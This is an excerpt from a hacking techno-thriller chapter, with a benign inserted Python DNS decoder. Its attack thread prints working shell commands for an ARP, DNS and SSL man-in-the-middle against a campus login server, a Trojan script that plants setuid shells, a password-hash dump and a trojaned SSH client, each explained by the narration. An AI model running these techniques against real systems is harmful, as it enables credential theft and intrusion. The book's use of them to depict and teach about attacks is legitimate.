Stealing The Network: How To Own An Identity (3 of 3)

April 3, 2006


The first two books in this series “Stealing the Network: How to Own the Box” and “Stealing the Network: How to Own a Continent” have become classics in the Hacker and Infosec communities because of their chillingly realistic depictions of criminal hacking techniques. In this third installment, the all-star cast of authors tackle one of the fastest growing crimes in the world: Identity Theft. Now, the criminal hackers readers have grown to both love and hate try to cover their tracks and vanish into thin air…

The seminal works in TechnoFiction, this "STN" collection yet again breaks new ground by casting light upon the mechanics and methods used by those lurking on the darker side of the Internet, engaging in the fastest growing crime in the world: identity theft. Cast upon a backdrop of "Evasion," surviving characters from "How to Own a Continent" find themselves on the run, fleeing from both authority and adversary, now using their technical prowess in a way they never expected: to survive.


Chapter 7 is excerpted from the book titled "Stealing The Network: How To Own An Identity" by Timothy Mullen, Ryan Russell, Riley (Caezar) Eller, Jeff Moss, Jay Beale, Johnny Long, Chris Hurley, Tom Parker, Brian Hatch, published by Syngress. ISBN: 1597490067; Published: August, 2005

Death by a Thousand Cuts

By Johnny Long
with Anthony Kokocinski


Rubbing the sleep from his eyes, Blain glared at his alarm clock. It was early Monday morning. Flir hadn’t typed a single keystroke in over 24 hours. Blain kicked off the single sheet that only served as a reminder of how unnecessary blankets were in this climate and shuffled over to his laptop. Logging in, he was greeted with a flurry of text. He snapped to attention.

“Hello, Flir,” Blain said with a grin. “Let’s see what you’re up to.” Blain’s smirk vanished as he saw the first of the keystrokes. Flir’s reputation was warranted. He commanded the machine with skill, torching through the shell with no errors whatsoever.

iwconfig eth1 enc on
iwconfig eth1 key 458E50DA1B7AB1378C32D68A58129012
iwconfig eth1 essid lazlosbasement
ifconfig eth1 2.3.2.1 netmask 255.0.0.0 up
iptables -I INPUT 1 -i eth1 -m mac --mac-source ! AA:BB:DD:EE:55:11 -j DROP
iptables -I INPUT -i eth1 -p tcp --dport ssh -s 2.3.2.20 -j ACCEPT
iptables -I INPUT 3 -i eth1 -j DROP

“Crap,” Blain said, despite himself. Flir had set up the wireless interface and created some very effective firewall rules without missing so much as a single keystroke. Specifically, he had turned on WEP encryption, assigned an encryption key, and configured an Extended Service Set ID (ESSID). He had also assigned a nonroutable IP address of 2.3.2.1 to the interface and enabled it.

Blain jotted down a copy of the WEP key on a Post-It note and stuck it to his desktop’s monitor. “That might come in handy later,” he thought. The ESSID of the machine was set to lazlosbasement. Lazlo Hollyfeld was a legend on campus, although few had ever met the reclusive genius. Flir’s last three commands set up three firewall rules, which dropped all wireless traffic that didn’t originate from 2.3.2.20, except Secure Shell (SSH) sessions, and also required a MAC address of AA:BB:DD:EE:55:11. The sebek log continued. Blain had some catching up to do. Flir had been busy this morning.

date 0613134799
openssl genrsa -out myptech.crt.key 1024
openssl req -new -key myptech.crt.key -out myptech.crt.csr
openssl x509 -req -days 365 -in myptech.crt.csr -signkey myptech.crt.key -out myptech.crt

Flir had set back his date to June 13, 1999, 1:47 PM, created an RSA keypair and certificate request, and had signed the request, which created an SSL certificate; the certificate and the private key were kept in the files myptech.crt and myptech.crt.key, respectively. Most of these commands were legitimate commands that a web server administrator might execute, but the fact that Flir had set back the date was suspicious.

At first, Blain couldn’t imagine why Flir did this, but later commands revealed the installation of libnet, libnids, and dsniff, which made Flir’s intentions perfectly clear. Next Flir ran webmitm, thereby launching an SSL “man-in-the-middle attack” against my.ptech.edu. Flir was going to snag usernames and passwords in transit to the main campus web server. Blain fired up his browser, and as the main Pacific Tech web page loaded, his heart sank.

“Student registration is coming,” he said, shocked that Flir was targeting the student registration system. The next set of commands revealed more details about his plan.

echo "192.168.3.50 my.ptech.edu" > /etc/hosts-to-spoof
dnsspoof -f /etc/hosts-to-spoof udp dst port 53

Flir was using the dnsspoof command, supplied by the dsniff package, to spoof DNS requests for the my.ptech.edu server. This was proof that the attacker’s intention was to use a man-in-the-middle attack against the my.ptech.edu server and its users. The next entry confused Blain.

iptables -I FORWARD 1 -p udp --dport 53 -m string --algo bm --hex-string "|01 00 00 01 00 00 00 00 00 00 02 6d 79 05 70 74 65 63 68 03 65 64 75 00 01|" -j DROP

This was an iptables firewall rule, that much was obvious, but he had never seen the --hex-string parameter used before. Obviously, the rule was grabbing UDP port 53-bound packets (-p udp --dport 53) that matched a string specified in hex, but that hex needed decoding. Blain launched another shell window and tossed the whole hex chunk through the Linux xxd command.

# echo "01 0000 0100 0000 0000 0002 6d 7905 7074 6563 6803 6564 75 00 01" | xxd -r -p
myptechedu#

The string myptechedu looked familiar, and Blain guessed that this rule must instruct the machine to drop any DNS query for the my.ptech.edu DNS name. This required verification. He fired off a tcpdump command from his laptop, tcpdump -XX, which would print packets and link headers in hex and ASCII as they flew past on the network. He then fired off a DNS lookup for my.ptech.edu from his machine with the command nslookup my.ptech.edu. A flurry of packets scrolled past the tcpdump window. After tapping Control-C, Blain scrolled back to one packet in particular.

17:02:43.320831 IP 192.168.2.1.domain > 192.168.2.60.50009: 25145 NXDomain 0/1/0 (97)
0x0000: 0011 2493 7d81 0030 bdc9 eb10 0800 4500 ..$.}..0......E.
0x0010: 007d 5141 0000 4011 a3a1 c0a8 0201 c0a8 .}QA..@.........
0x0020: 023c 0035 c359 0069 28d5 6239 8183 0001 .<.5.Y.i(.b9....
0x0030: 0000 0001 0000 026d 7905 7074 6563 6803 .......my.ptech.
0x0040: 6564 7500 0001 0001 c015 0006 0001 0000 edu.............
0x0050: 2a26 0037 024c 3305 4e53 544c 4403 434f *&.7.L3.NSTLD.CO

Lining up a portion of the packet capture confirmed that the bytes 02 6d 79 05 70 74 65 63 68 03 65 64 75 00 matched the hostname chunk of the mysterious hex code used in the iptables command, including the odd hex characters between the portions of the hostname. It sure looked like this rule was dropping DNS packets that queried for the my.ptech.edu server, but that made no sense. Tracing through all this stuff was a real pain, and Blain hated playing forensics. “Life is so much easier when you’re on offense,” he thought. Blain took a deep breath, and read the last of Flir’s commands from his morning session.
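The byte-by-byte comparison Blain does by eye can be scripted. As an added example (not from the book), here is a small Python codec for DNS wire-format names that decodes the hostname bytes from the iptables hex string and checks them against the question section of the captured reply. The hex values are copied from the page; the helper names (encode_name, decode_name, dns_questions and so on) are my own.

```python
"""Decode the DNS wire-format name inside the iptables --hex-string rule and
line it up with the qname of the tcpdump capture shown on the page.

Added example, not code from the book: a plain-Python DNS label codec plus a
question-section parser that works on a raw DNS message.
"""
from __future__ import annotations
import struct

# Hex pattern from the iptables rule on the page: DNS header minus the 2-byte
# ID (flags 0x0100, QDCOUNT 1, AN/NS/AR 0), then the encoded qname.
RULE_HEX = "01 00 00 01 00 00 00 00 00 00 02 6d 79 05 70 74 65 63 68 03 65 64 75 00 01"

# Constructed from the tcpdump -XX rows 0x0000-0x0050 on the page: Ethernet,
# IPv4 and UDP headers followed by the start of the NXDomain reply.
CAPTURE_HEX = (
    "0011 2493 7d81 0030 bdc9 eb10 0800 4500"
    "007d 5141 0000 4011 a3a1 c0a8 0201 c0a8"
    "023c 0035 c359 0069 28d5 6239 8183 0001"
    "0000 0001 0000 026d 7905 7074 6563 6803"
    "6564 7500 0001 0001 c015 0006 0001 0000"
    "2a26 0037 024c 3305 4e53 544c 4403 434f"
)


def encode_name(name: str) -> bytes:
    """'my.ptech.edu' -> length-prefixed labels terminated by a zero byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def decode_name(data: bytes, offset: int) -> tuple[str, int]:
    """Decode a wire-format name at offset, following 0xC0 compression
    pointers. Returns (name, offset just past the name in the original stream)."""
    labels, end, hops = [], None, 0
    while True:
        length = data[offset]
        if length & 0xC0 == 0xC0:                  # compression pointer
            if end is None:
                end = offset + 2                   # name occupies 2 bytes here
            offset = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            hops += 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            continue
        offset += 1
        if length == 0:
            break
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (end if end is not None else offset)


def dns_questions(msg: bytes) -> list[tuple[str, int, int]]:
    """Parse the question section of a raw DNS message: [(name, qtype, qclass)]."""
    qdcount = struct.unpack("!H", msg[4:6])[0]
    off, out = 12, []
    for _ in range(qdcount):
        name, off = decode_name(msg, off)
        qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
        off += 4
        out.append((name, qtype, qclass))
    return out


def queries_for(msg: bytes, name: str) -> bool:
    """True if any question in the message asks for the given name."""
    return any(q[0].lower() == name.lower() for q in dns_questions(msg))


def dns_payload_from_frame(frame: bytes) -> bytes:
    """Strip Ethernet (14), IPv4 (IHL*4) and UDP (8) headers from a frame."""
    ihl = (frame[14] & 0x0F) * 4
    return frame[14 + ihl + 8:]


def rule_name() -> str:
    """Hostname encoded in the rule's hex string (skip the 10 header bytes)."""
    return decode_name(bytes.fromhex(RULE_HEX), 10)[0]


if __name__ == "__main__":
    msg = dns_payload_from_frame(bytes.fromhex(CAPTURE_HEX))
    print("rule encodes:", rule_name())
    print("capture asks:", dns_questions(msg))
    print("rule qname bytes present in capture:", encode_name("my.ptech.edu") in msg)
```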

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof 10.0.0.1

Once he saw this command, it all made sense: Flir completed the attack by enabling IP packet forwarding and running arpspoof, which would trick all devices within range of an ARP packet to talk to the Rogue instead of the default gateway, 10.0.0.1. This was a classic ARP man-in-the-middle. After being combined with webmitm and dnsspoof, Rogue was in the perfect position to steal Pacific Tech users’ SSL data when they connected to my.ptech.edu’s Web server. The iptables rule to drop DNS packets now made sense as well: the Rogue would drop legitimate DNS requests made by clients (and now spoofed by dnsspoof), which was possible now that Rogue was the new default gateway on the network.

It was a nice piece of work, and exactly the sort of thing that dsniff was often used for. Blain was impressed with Flir’s skills, but this was no academic exercise. Flir was committing theft, plain and simple. His victims were to be the student body of Pacific Tech, and not only would Flir have access to their usernames and passwords, he would get personal information about them as well. Blain felt as horrible as he possibly could. “There must be a rational explanation for Flir’s behavior,” he thought. His laptop waited to record Flir’s next move. Blain hopped in the shower to get ready for the day and think through his options.

When the iPod and the camera arrived in the office, Ryan was ready. He inventoried and inspected the items, noted the condition of each, and entered it into the report. By the end of most cases, the report would be lengthy, but this case was different. Ryan knew that from the start: this wasn’t a “computer crime” case, and there was no computer hard drive to analyze, which meant that there would be much less digital evidence. Ryan needed to squeeze every last ounce of data from these devices, especially since this was a Fed case. He took pride in his work, but also realized that there was only so much that he could do with these two devices. “Time to think outside the box,” he said, slipping on his headphones and firing up some tunes on Scott’s iPod.

Ryan ran through the procedure he had developed yesterday, and produced a clean image from the iPod without engaging the Apple drivers. The image was not only clean and error-free, it was exactly as it had been when it was picked up at the scene. As far as Ryan’s research had suggested, there was not a single bit of data modified by his image extraction process.

He exported the image to a DVD and set his Windows boxes to chew on the data with several heavyweight industry-standard forensics tools. Some of the tools were proprietary law enforcement tools, but even the best tools could not replace a bright analyst. Ryan couldn’t stand tool monkeys who kept looking for the famed “find evidence” button. Ryan joked to the new analysts that the “find evidence” button could be found right next to the “plant evidence” button in the newest version of the Windows tools. Smiling, Ryan trolled through the data on the Mac, and found everything pretty much as he had expected it. The iPod had been named “Charlos,” and had fairly little data on it. A decent collection of songs had been loaded onto the device. Ryan made copies of every song, added them to a playlist in his own library, and blasted them through his headphones.

The iPod’s “Calendar” directory was empty, but the “Contacts” directory had several “vCard” formatted contact files. Ryan noted each contact in the report, and made a special note of one particularly empty entry, for a “Knuth.” Any decent analyst would have flagged the entry, which was completely blank except for the first name and a P.O. box.

A Suspicious Address Book Entry

The songs on the device varied in file type and style, and even included some Duran Duran songs that Ryan hadn’t heard in years. He homed in on some of the less-standard file types, particularly the m4p files. Ryan knew that these were AAC protected audio files, like the ones purchased from the iTunes Music Store. Ryan double-clicked on one such file, which launched iTunes. Presented with an authorization box, Ryan noted that an email address had already been populated in the authorization form.

iTunes Computer Authorization Form

This type of file would not play without a password, and Ryan didn’t have that password. He did have a copy of DVD Jon’s software for whacking the password protection—for testing purposes, of course… He pressed the preview button, and was whisked away to the iTunes Music Store, which presented a sample of the song. Ryan right-clicked the file in iTunes and selected “Show Info” to get more information about the song.

iTunes Show Info

Ryan noted the metadata stored in the song included the name Charlos, an email address of charlos@hushmail.com, and the “last played” date, all of which the Feds could probably use. The account name mapped back to an Apple ID, the contents of which could be subpoenaed. Each song had its own store of metadata, and most investigators failed to look behind the scenes to make sense of this data. Ryan had less to work with, so every bit of detail counted, and landed in his report. The play count of the songs could be used for profiling purposes, painting a very clear picture of the types of music the owner liked, which might point to other avenues for investigation. Ryan ran a utility to extract, categorize and sort all the metadata from each of the files. When he did, he noticed an interesting trend: the Comments ID3 tag was blank in the vast majority of tracks, but a handful of songs had hexadecimal data stored in the field.

Hex Data in ID3 Comments Field

Ryan wasn’t sure what this data was, but he made a note of it in his report. “The Feds might want to know about this,” Ryan reasoned. As he pored over the rest of the files on the device, Ryan only found one file that was out of place, a relatively large file named knoppix.img:

drwxr-xr-x 15 charlos unknown 510B 23 Apr 00:16 .
drwxrwxrwt 6 root admin 204B 23 Apr 00:05 ..
-rwxrwxrwx 1 charlos unknown 6K 3 Mar 00:59 .DS_Store
d-wx-wx-wx 5 charlos unknown 170B 17 Mar 21:00 .Trashes
-rw-r--r-- 1 charlos unknown 45K 11 Apr 2003 .VolumeIcon.icns
drwxr-xr-x 3 charlos unknown 102B 11 Oct 2003 Calendars
drwxr-xr-x 5 charlos unknown 170B 11 Oct 2003 Contacts
-rw-r--r-- 1 charlos unknown 1K 14 Jun 2003 Desktop DB
-rw-r--r-- 1 charlos unknown 2B 14 Jun 2003 Desktop DF
-rw-r--r-- 1 charlos unknown 0B 26 Feb 2002 Icon?
drwxr-xr-x 16 charlos unknown 544B 9 Mar 11:07 Notes
drwxrwxrwt 3 charlos unknown 102B 16 Mar 15:41 Temporary Items
drwxrwxrwx 6 charlos unknown 204B 14 Jun 2003 iPod_Control
-rw-r--r-- 1 charlos unknown 64M 23 Apr 00:16 knoppix.img

The file was exactly 64MB in size, and the file command reported it as raw data. A quick Google search revealed that Knoppix, a CD-based version of Linux, had the ability to create encrypted, persistent home directories that would store a user’s files and configuration settings. This file had nothing to do with “normal” iPod usage, and Ryan found the file’s mere presence suspicious. After downloading Knoppix and following the directions for mounting the file as a home directory, Ryan was disappointed to discover that the system prompted him for a password. The file was probably protected with 256–bit Advanced Encryption Standard (AES), according to the Knoppix web page. There was no way Ryan would go toe-to-toe with that much heavy-duty encryption. “Another job for the Feds,” Ryan reasoned.

Having milked the iPod for all it was worth, Ryan moved on to the digital camera. Cameras were really no sweat: the camera’s memory card contained the interesting data, and once it was removed from the camera, it could be inserted into a card reader and imaged in a process similar to the one used on the iPod. Some cards, such as SD cards, could be write-protected to prevent accidental writes to the card, and companies like mykeytech.com sold specialized readers that prevented writes to other types of cards.

Camera imaging was a pretty simple thing, and most investigators took the process for granted. Ryan, however, never took anything at face value. For starters, he actually looked at the images from a digital camera. Sure, every investigator looked at the pictures, but Ryan really used his head when he looked through the pictures.

In this particular case, Ryan’s attention to detail actually paid off: there were few pictures on the camera, even after recovering “deleted” images. One picture just didn’t fit. It didn’t feel right. The picture showed a rather messy desk, with two 17” flat panel monitors, a keyboard, a docking station for a laptop computer, and various other stationery items. The thing that stuck out about the picture was the fact that it was completely and utterly unremarkable, and didn’t fit the context of the adjacent pictures on the memory card.

A Clean Desk: Sign of a Diseased Mind?

When Ryan looked behind the scenes, he discovered something strange: the other pictures on the card had date stamps in their Exchangeable Image File (EXIF) headers that matched the photos themselves. If a picture was stamped with a morning timestamp, the picture appeared to be well lit, and looked like it was taken in the morning. According to the date and time stamps inside this particular picture, it was taken at four in the morning!

Surprising EXIF Data

Ryan inspected the image more closely. He was sure that he saw sunlight peeking through the blinds in the background. “The camera’s clock died,” Ryan said. “The internal clock must have reset. Still, though, what if…” Ryan trailed off, lost in his work.

Ryan picked up the camera and selected the main menu. He checked the date and time that were set on the camera. Ryan looked at his watch. The camera’s clock was accurate, and confirmed that the time zone matched the profile of the other images on the camera. “If the clock had reset,” Ryan reasoned, “it might have been fixed after the picture was taken.” Ryan was still not convinced.

He pored over the image, looking for more details. Focusing on the stack of papers on the left side of the desk, Ryan saw what he thought was paper with a company letterhead. He dragged a copy of the image into Adobe Photoshop. After a few minutes of playing with the image, Ryan had isolated the writing on the letterhead. At first it was difficult to read, but massive brightness and contrast adjustments revealed it for what it was.

Photoshop-Processed Letterhead

The logo displayed the letters “NOC.” A quick Google image search revealed that “NOC” stood for the Nigerian Oil Company. Ryan checked an online time zone map, and sure enough, at 4:17 AM in this camera’s timezone, Nigerians were enjoying nice, blind-penetrating daylight!

“This guy took a picture of some desk inside the Nigerian Oil Company,” Ryan thought. “What was he doing inside the Nigerian Oil Company, and why would he only take one picture of some guy’s desk?” Based on the Knoppix encrypted home directory that Charlos had on his iPod, Ryan knew Charlos was at least somewhat technical. Focusing on other details in the image, Ryan also found a Sun Microsystems logo on a keyboard below the desk and several Post-it Notes, two of which read “Good site: sensepost.com” and “Meyer .42.”

Searching Google for sensepost.com, Ryan found out that SensePost was involved in computer security in South Africa. Cross-referencing the word “Meyer” with “Nigerian Oil Company” in Google brought up a handful of conference sites listing “Paul Meyer” as the CSO of the Nigerian Oil Company, and a speaker on security topics. Ryan had no idea what all of this meant, but it was clear that Charlos was technical, and that he had traveled all the way to Nigeria to get one picture of a desk possibly belonging to the CSO of the Nigerian Oil Company. “Interesting stuff,” Ryan thought.

Ryan felt like he had done all he could. Tomorrow would be another day, and the pile of cases waiting for him was already growing. There were still avenues to pursue, but the payoff would be small. Ryan wondered about the Hushmail account and some of the other evidence that was offsite. He figured he would ask Mike. He wandered down the hall, and was reading a draft of his report when he walked through Mike’s door. “Hey Mike.”

“Ryan, check out how hairy this broad is!”

“Gah! You just can’t spring that on a person!”

“We were chatting and this pervert just sent this to me, like it would get me hot. What a horrible call that was. Can I add bad taste to aggravation of the charges on this guy?”

“I don’t know, Mike, but listen… What can we do with offsite storage? Things like email addresses, web sites the guy made purchases from, stuff like that?”

“Well, we can get transaction information, registration information, a copy of the account contents, all depending on what kind of legal paperwork you send them.”

“Okay, thanks. I’m sure we’ll need to chase this case down some more. Thanks. And good luck with your case.”

“Sure! Hey, you wanna see some more? This guy is twisted.”

Ryan was already out the door, hoping to avoid any further visual assaults. He needed to write a memo that would recommend further legal paperwork be filed. The Feds could probably figure out whatever came from that on their own, so he didn’t worry. Once this case went anywhere, the lawyer would call him, anyway. He usually found how his cases turned out because he either went to court or had to explain his reports. He had done everything he could think to do, and would sleep well tonight, unless he thought more about Mike’s pictures.

Blain’s laptop had been idle for hours when his monitoring shell sprung to life with a short flurry of characters. Flir was back in action, and Blain’s sebek server revealed all of his keystrokes. Settling into his chair, Blain’s hand reached for the mouse. He sifted through the many lines of output, stripping all but the command portion of the sebek data. “Follow the yellow brick road,” Blain mumbled, a slight grin on his face.

ifconfig eth0:0 10.0.50.49
ssh -b 10.0.50.49 mrash@mac3.gnrl.ptech.edu
tables!rocks6
nidump passwd .
ls -l /usr/bin/nidump

First, Flir assigned an alias IP address to Rogue’s wired interface. Then he used ssh to connect to the mac3 machine on campus, with the -b switch to instruct the program to use this faked address. Flir connected as the user mrash with a password of “tables!rocks6.” This was a slick way of spoofing where he was coming from. The logs on the mac3 server—from the looks of it a Macintosh—would show that he had connected from the 10.0.50.49 IP address, misleading any investigation.

“Slick,” Blain said aloud, despite himself. He assumed that the mrash account had been compromised via the elaborate SSL man-in-the-middle attack that Flir had leveraged against the my.ptech.edu server. The confusing thing was that this account information should have worked against only the web server application on my.ptech.edu, not against the mac3 machine. Blain got the sneaking suspicion that Flir had discovered the use of a shared password database across machines. The next commands showed Flir trying to dump the password portion of mac3’s NetInfo database, which housed administrative information.

Flir’s use of the -l switch when performing an ls command troubled Blain. Ordinarily, it’s easy to profile a user based on extraneous commands and excessive parameters to programs. This wasn’t the case with Flir. He was fast and precise, and used only the options necessary to accomplish his task. The next set of commands was fairly straightforward.

netstat -an | grep LISTEN
ps aux

Flir was obviously looking for listening servers on mac3, and checking the process list with ps to get an idea of what was running on the machine. Next came a flurry of find commands:

find / -perm -04000 -type f -ls
find / -perm -02000 -type f -ls
find / -perm -002 -type f -ls
find / -perm -002 -type d -ls

Flir was looking for setuid and setgid files and directories with the first two commands. Programs with these permissions often provided an attacker with a means of escalating his privileges on the system. Combined with the failed nidump command, it was obvious he did not have a root-level account on this server. The next set of find commands searched for programs that any user could modify. Depending on the contents of these files or directories, Flir might try to use them to leverage improved access on the system. The next set of commands indicated that Flir had found something interesting in one of the previous commands:

ls -l /Applications/Gimp.app/Contents/
cat /Applications/Gimp.app/Contents/Info.plist
cat >.Gimp.new
#!/bin/sh
cp /bin/zsh "/Users/mrash/Public/Drop Box/.shells/zsh-`whoami`"
chmod 4755 "/Users/mrash/Public/Drop Box/.shells/zsh-`whoami`"
./.Gimp
mv Gimp .Gimp
mv .Gimp.new Gimp
chmod 0755 Gimp

“The GIMP” was the GNU Image Manipulation Program, an open-source graphics program on par with Adobe Photoshop. From the looks of Flir’s commands, he was about to do something downright unnatural to Gimp: with write access to The GIMP program’s directory, Flir created a .Gimp.new program. When run, this made a copy of the zsh shell, one named for the user who executed the Trojan horse, and placed the new shell in mrash’s drop box. The Trojan would next change the permissions of the shell so that any user who executed it would gain the same level of access as the user who created it. Finally, the Trojan would execute the .Gimp program, which was a copy of the original Gimp program. Flir renamed his .Gimp.new program to Gimp, and changed its permissions to make it executable. This was a classic bait-and-switch, and any user running Gimp would unknowingly give away their access to the system in the form of a shell stashed in mrash’s drop box. Flir was looking to bust root on the Mac server, hoping that a root user was bound to launch Gimp eventually. The next set of keystrokes was a bit confusing at first, until Blain realized that they began execution on Rogue, not mac3.

ifconfig eth0:0 10.0.50.57
ssh -b 10.0.50.57 griffy@mac3.gnrl.ptech.edu
griffy_vamp-slayR
ls -l ~mrash/Public/Drop\ Box/.shells | grep zsh
~mrash/Public/Drop\ Box/.shells/zsh-steve

Again, Flir used the ifconfig command to assign an alias on Rogue’s wired interface, then used ssh to connect to the Mac server. This time he connected as the user griffy, with a password of “griffy_vamp-slayR,” another compromised user account. Flir’s Gimp ruse had obviously worked, as he had at least one shell, zsh-steve, sitting in the mrash drop box. Flir executed the shell, and gained access to the system as the Steve user. The next commands made Blain realize that the Steve user was no ordinary user.

nidump passwd . > ~mrash/Public/Drop\ Box/.shells/hash
chmod 755 ~mrash/Public/Drop\ Box/.shells/hash
less ~mrash/Public/Drop\ Box/.shells/hash
wc -l /etc/passwd
exit

This time, the nidump command worked, and Blain watched in amazement as Flir gained access to the Mac’s password database, which presumably contained the encrypted passwords of all the system’s users. Flir ran a command to count the number of users on the system and, satisfied, logged out of the system. Further on in the history file, things started getting very interesting on the mac3 server.

ssh -V

First, Flir checked the version number of the ssh client running on the server. Next, a flurry of commands scrolled by, which showed him downloading the source code for OpenSSH, then using the vi editor to modify several files. The keystrokes between the vi commands started running by fast and furious, and Blain had to use a grep "^vi" command to just get an idea of the files that were modified.

vi includes.h
vi ssh.c
vi readpass.c
vi auth-pam.c
vi auth-passwd.c
vi log.c
vi loginrec.c
vi monitor.c

“Holy crap,” Blain murmured as his eyes bounced between the file names and the commands being executed, “he’s modding the ssh source code! He’s making a Trojan ssh client!” Once the files were modified, Flir compiled OpenSSH and pushed the SSH binary up to the ~mrash/Public/Drop Box/.shells directory on mac3. Flir’s commands continued.

~mrash/Public/Drop\ Box/.shells/zsh-wstearns
cp ~mrash/Public/Drop\ Box/.shells/ssh ~/bin/
echo 'export PATH=$HOME/bin:$PATH' >> ~/.bashrc
ps auxl | grep wstearns
kill -9 566
exit

Blain watched as Flir ran the zsh-wstearns shell, to take on the identity of yet another user. Proceeding as wstearns, Flir modified the user’s PATH statement, to cause any ssh command to execute the Trojan ssh program instead of the real one. Then, seeing that wstearns was online, Flir sent a kill to process 566, most likely wstearns’ active ssh process. Almost immediately after killing the user’s ssh session, Flir unceremoniously disconnected from the mac3 server and Rogue’s sessions went idle.

“He’s working on cracking that password file,” Blain thought to himself. “He’s expanding his access through the entire Pacific Tech network.” Blain had become obsessed with Flir’s activities and, like many things in his life, he had developed “tunnel vision.” He knew that he wouldn’t be able to back off of this, his first challenge as a Pac Tech freshman. “Flir,” Blain mumbled. He realized at that moment that he had been referring to Mitch as ‘Flir’ ever since he found the rogue laptop. Blain wondered where the handle had come from. Many handles were impossible to unravel, but this one sounded intentional.

A quick Google search revealed that FLIR stood for “forward looking infrared”, an advanced camera system used extensively by the military. It seemed odd that Mitch would be using a nickname coined by the military, especially since it was common knowledge that Mitch thought very little of the military. The government funded the grant work Mitch had done on a high-powered laser in his freshman year, and legend had it that when Mitch and his mentor Chris Knight discovered that the laser was to be used as a deadly military weapon, they fought back against the corrupt professor, who was secretly shaving off grant money to fund his personal endeavors. It seemed that Mitch would be very leery of anything involving the military, but nonetheless, he was using a military acronym as a nickname. Perhaps it was irony, or perhaps it had nothing at all to do with anything. The only way to know for sure was to just ask Mitch, and after the tragedy of their first meeting… Blain sighed out loud, lost in his thoughts. For years he had followed Mitch’s work, and although they had only met once, Blain felt a connection with Mitch, or Flir, or whoever he was these days. Flir was offline now, which gave Blain a chance to take a break, grab some caffeine, and think things through.

I had followed Knuth all the way from his home, and I was getting tired. I stayed quite a distance back from the bus, and although Knuth sat near the front, I didn’t want to take any chances. I had to follow him to his destination without arousing any suspicion. The odds were good that this guy had all sorts of alternate plans should he get the sense he was being tailed. I couldn’t afford to spook him. At one point, a highway patrol car pulled up behind me. It seemed that the officer was recording my tag number. The officer sped up. As he passed me, he looked at me for what I considered to be an inordinately long time.

The officer continued to accelerate, eventually pulling alongside the bus. He spent a reasonable amount of time checking out the passengers, spending much more time near the front of the bus. As he passed it, I noticed that he turned towards his data terminal, obviously entering something. This cop seemed to be up to something, but eventually he passed the bus. I didn’t see another patrol car for the entire trip. At first I wondered if Anthony’s entry into the system had generated an alert already, but that seemed rather unlikely. I glanced in my rear-view mirror and saw the sedan for the first time. A rental. Loose tail. Most likely the Bureau.

“Stupid whitewashed pencil-pushing….” I was furious. I wasn’t sure if they were tailing me or Knuth, and I didn’t really care. All I knew was that this was just the thing that would spook Knuth. At our next stop, I parked far from the bus, and my tail parked quite a ways from me. After the bus had unloaded into a middle-of-nowhere diner, I exited the car and made my way to an adjacent coffee shop. Since the front door was out of sight of my Fed, I was able to slip around the back of the shop and make my way behind his vehicle. He was on the cell phone, and his window was down.

This guy was obviously not a field agent. There was no way I should have been able to get this close to him so easily. From behind his vehicle, I moved alongside the passenger door, and within a moment came the sharp inhale of a man caught by surprise. I’m not sure why he was surprised, but it probably had something to do with the 9 mm barrel I had pressed into his larynx, or perhaps with the fact that he was about to urinate himself.

“Hang up, now.”

Agent Summers carefully hung up the phone.

“Look, pal,” Summers began, entering his terrorist negotiation mode.

“You aren’t my pal, Pal,” I interrupted. “Who are you?”

“Agent Summers, Federal…” he began to reach inside his coat.

“Whoa, hotshot! I’ll take care of that.” With my free hand I reached inside his coat and removed his creds. He was legit, or so it appeared. “Okay, Agent Summers. I’m not the bad guy here. Knuth is. I’m putting away my sidearm, don’t do anything stupid or we’ll both lose him.”

As I pulled away the sidearm, Agent Summers nailed me in the gut with the car door. That was unexpected. Agent Summers was tangled in his seatbelt as he tried to make his move. It took him too long. I expected that. In less than a second, Agent Summers was back where he started, my gun to his throat, his seatbelt now unlatched and draped limply across his chest. I was losing my patience.

“Look, Summers, my boy,” I spat, “if it wasn’t for me, you wouldn’t have anything on Knuth, and you certainly wouldn’t be given the unique opportunity to spook him. Your tail was obvious to me, and if it wasn’t for the fact that I was so far back, Knuth would have made you immediately. Now do you want this guy or not?” I eased the pressure on his throat and let him speak.

“Who the hell are you, anyway? What agency are you…” he said. I flashed my creds with my free hand. “Retired creds? Do you have any clue how much prison time you’re facing pulling a stunt like this?”

“Look, this guy’s a scumbag, pure and simple. I know it and you know it. The fact that you’re even out here proves that I was right. This guy’s in deep, isn’t he? What is it? Extortion? Conspiracy? Homicide?” I could tell from the twitch in Summers’ features that it was homicide. “How many did he kill?”

“Two that we know of. There may be many more in the mix, but we’re just not sure.”

“Of course you aren’t sure. He’s paranoid. He’s careful. He’s good. But he’s not that good.”

Summers turned his head to look at me for the first time. I could tell he was working something through in his mind. “Okay,” he began, “We’re on the same team here, but I have to call you off. You shouldn’t even be out here, especially not with an agent’s sidearm. If you walk away right now, we can still nail this guy. You never existed, and you certainly never went into his house.”

My look betrayed my thoughts.

“Yes, we know all about you being in the house,” Summers scolded, “but no one else knows about that. It can stay that way. But you need to back off now. Just walk away. I’ll be much more careful, and I’ll call in some backup, but you need to go. Otherwise, you’re endangering this entire operation.”

“Operation?” This was bigger than I thought. Summers wasn’t telling me something, but that was to be expected. Unfortunately, he had a point, and I knew it would eventually come to this. “Fine, I’ll back off,” I lied. “I don’t need prison time for trying to do something for my country. It’s not worth it to me.” I knew Summers couldn’t tell I was lying. His features softened and his breathing stayed constant. “But don’t spook this guy. You have no idea how paranoid he is.”

“I hear you, but no funny business. If I see you again, I’ll call you in, or worse…”

The kid was out of his league, but I faked my best look of concern, and said “Deal. See you in the next life.”

I walked to my car and drove away. I had to be very careful now. Summers couldn’t know I was tailing him. Things would definitely get ugly then. Something wasn’t right about this kid, and I wasn’t about to trust Knuth to him.

Blain had spent the past many hours in a haze. He hated the idea that Flir was up to no good, and he had resolved to simply talk to him. He didn’t want to make a big deal out of it, but something had to be done, and regardless of what Flir thought of him, the time had come to say something. He checked in on Flir’s activity. The past day had been a busy one for the genius hacker. There was so much to process, but Blain’s eyes were drawn to a few commands in particular.

~mrash/Public/Drop Box/.shells/zsh-wstearns
ssh wstearns@gateway.cluster.vatech.edu
mason30firewall

